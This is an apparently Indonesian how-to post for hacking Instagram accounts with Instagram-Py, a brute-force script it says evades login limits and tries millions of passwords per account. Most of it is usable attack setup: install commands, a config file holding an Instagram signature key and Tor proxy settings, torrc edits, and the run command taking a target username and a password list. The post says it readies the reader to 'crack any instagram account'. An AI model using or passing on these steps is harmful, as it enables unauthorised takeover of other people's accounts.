Cara Hack Akun Instagram Dengan Metode Brute Force - Instagram-Py adalah skrip python sederhana untuk melakukan serangan brute force dasar terhadap Instagram, skrip ini dapat mem-bypass pembatasan login pada kata sandi yang salah, jadi pada dasarnya ia dapat menguji jumlah kata sandi yang tak terbatas.
Instagram-Py terbukti dan dapat menguji lebih dari 6 juta kata sandi pada satu akun Instagram dengan sumber daya sesedikit mungkin. Skrip ini meniru aktivitas aplikasi android instagram resmi dan mengirimkan permintaan untuk Anda aman, tetapi jika instalasi Anda salah dikonfigurasikan maka kesalahan ada pada Anda.
Instagram-Py terbukti dan dapat menguji lebih dari 6 juta kata sandi pada satu akun Instagram dengan sumber daya sesedikit mungkin. Skrip ini meniru aktivitas aplikasi android instagram resmi dan mengirimkan permintaan untuk Anda aman, tetapi jika instalasi Anda salah dikonfigurasikan maka kesalahan ada pada Anda.
- python3
- tor
- requests
- requests[socks]
- stem
using pip to get Instagram-py
Make sure you have got the latest version of pip(>= 9.0 and python(>= 3.6)
Make sure you have got the latest version of pip(>= 9.0 and python(>= 3.6)
$ sudo easy_install3 -U pip # you have to install python3-setuptools , update pip
$ sudo pip3 install requests --upgrade
$ sudo pip3 install requests[socks]
$ sudo pip3 install stem
$ sudo pip3 install instagram-py
$ instagram-py # installed successfully
$ # Now lets copy the config file to your hard drive!
$ wget -O ~/instapy-config.json ""
Open your configuration file found in your home directory , this file is very important located at ~/instapy-config.json , do not change anything except tor configuration
$ vim ~/instapy-config.json # open it with your favorite text editior!
The configuration file looks like this
"api-url" : "",
"user-agent" : "Instagram 10.26.0 Android (18/4.3; 320dp..... ",
"ig-sig-key" : "4f8732eb9ba7d1c8e8897a75d6474d4eb3f5279137431b2aafb71fafe2abe178",
"ig-sig-version" : "4",
"tor" : {
"server" : "",
"port" : "9050",
"protocol" : "socks5",
"control" : {
"password" : "",
"port" : "9051"
api-url : do not change this unless you know what you are doing
user-agent : do not change this unless you know your stuff
ig-sig_key : never change this unless new release, this is extracted from the instagram apk file
tor : change everything according to your tor server configuration , do not mess up!
open your tor configuration file usually located at /etc/tor/torrc
$ sudo vim /etc/tor/torrc # open it with your text editor
search for the file for this specific section
## The port on which Tor will listen for local connections from Tor
## controller applications, as documented in control-spec.txt.
#ControlPort 9051
uncomment ‘ControlPort’ by deleting the # before ‘ControlPort’ , now save the file and restart your tor server
now you are ready to crack any instagram account , make sure your tor configuration matched ~/instapy-config.json
Finally , now you can use instagram-py!
$ instagram-py your_account_username path_to_password_list
The MIT License,
Copyright (C) 2017 The Future Shell , DeathSec
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